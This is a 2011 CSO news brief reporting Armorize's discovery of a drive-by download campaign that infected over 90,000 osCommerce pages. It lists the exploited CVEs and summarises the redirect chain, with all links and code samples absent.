Drive-by download infects more than 90,000 sites, Armorize warns

Wayne Huang and his Armorize team have discovered a massive drive-by download that has infected more than 90,000 sites.

Some bullet points sent to me by Joe Franscella, who handles PR for the security vendor:

•Google has indexed over 90,000 infected sites

•The malicious domain is shown in the blog: (do not visit, you may get infected)

•The attack targets osCommerce sites — Open Source eCommerce solutions used by over 249,000 online store owners

The Armorize malware blog includes multiple screen shots and code samples that illustrate the findings. Among other points:

--There's been a mass scale injection ongoing recently, with the injected iframe pointing to Google indicates more than 90,000 infected pages (note it's pages not domains).

--Browser exploits used:

CVE-2010-0840 -- Java Trust

CVE-2010-0188 –- PDF LibTiff

CVE-2010-0886 -– Java SMB

CVE-2006-0003 -– IE MDAC

CVE-2010-1885 – HCP

1. Infected website is injected with one of several scripts:

2. Browser loads, redirected (302) to

3. Contents of is here on pastebin, loads javascript from

4. javascript here on pastebin, decodes to this, generates iframe pointing to:

5. Contents of is here, redirects to:

6. Contents of is here, decodes to this. This includes multiple browser exploits.

7. After successful exploitation, browser downloads and executes malware from here:

Thanks to the folks at Armorize for flagging this.

--Bill Brenner

one-stop view of latest business threats. We created it for you! Bookmark it! Use it!

CSO's Daily Dashboard gives you a

Copyright © 2011 IDG Communications, Inc.

7 hot cybersecurity trends (and 2 going cold)